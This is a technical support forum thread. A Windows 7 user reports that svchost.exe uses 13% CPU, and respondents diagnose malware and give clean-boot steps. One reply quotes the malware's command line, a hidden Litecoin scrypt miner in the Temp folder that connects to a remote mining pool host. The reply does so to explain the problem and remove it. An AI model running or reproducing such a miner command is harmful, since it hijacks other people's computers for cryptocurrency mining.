svchost process takes 13% of my CPU RRS feed

  • Question

  • Hello,
I have to ask help now also. I got the same kind of problem (svchost process takes 13% of my CPU, even after I restart the computer and it doesn't stop).
I have noticed this problem recently (maybe it started around one or two weeks ago).
    I am using Windows 7.
I have never had this problem before and I have scanned my computer of spyware, malmware and viruses with F-Secure, Anti Malmware and super antispyware. I have done the trace (like adviced here) and here is the result  dropbox.com/s/bolmr7y63gih5ms/highCPUUsage.7z

Just in case here is also a screenshot from Processexplorer    https://www.dropbox.com/s/fvszf7u2hqg1rgq/fromProcessExplorerSVCHOSTexe.jpg

I have tried with this help  http://techietalkz.com/2010/03/08/solve-svchost-exe-high-cpu-usage-in-windows-7-how-to/    but it wasn't because of that (I stopped the process but still it was 13% usage). Only "new thing" that has happened (besides the Windows Updates) is that I bought Canon MG5350 printer and I'm using it from WLAN (I had to install some Canon program to my computer so that it works ... but not sure if this is related or not). I appreciate all the help I can get and if you need more information, I'm glad to tell you so I could understand the cause of this problem.

    Regards,
    Kai

  • The exe is stored in the temp folder, which means you have malware which uses your nVIDIA GPU for calculations:

    "C:\Users\kai\AppData\Local\Temp\svchost.exe" -o http://p.a2a1f63d98e3755f63fb60485a56c853.com:3000 --scrypt --no-submit-stale -O ltc:ltc -l 1 -I 12 -w 64

Boot into safe mode, run msconfig, uncheck the automatic startup and delete the file from the temp folder.

Also do a full virus scan.

  • Hi,

    I agree with Andre.Ziegler.

In addition,  we can follow these steps to check whether the issue is caused by 3rd part programs, if so, you may uninstall it to fix the issue.

Does the issue exist in safe mode? If not, let us continue to the next step.

    Clean Boot

To place the computer in a clean boot state, follow the steps below:

    1. Click Start, type msconfig in the Start Search box, and then press ENTER. If you are prompted for an administrator password or for a confirmation, type the password, or click Continue.
    2. On the General tab, click Selective Startup.
    3. Under Selective Startup, click to clear the Load Startup Items check box.
    4. Click the Services tab, click to select the Hide All Microsoft Services check box, and then click Disable All.
    5. Click OK.
    6. When you are prompted, click Restart.
    7. After the computer starts, check whether the problem is resolved.

If the issue doesn’t appear, you can determine which one can be the cause by using dichotomy in MSconfig. Checking on half of Non-Microsoft service and restart, determining which half of the services cause the issue and repeating to check half of the problematic half services.

In addition, I would like to share the link below to check the issue:

    Hope it helps.
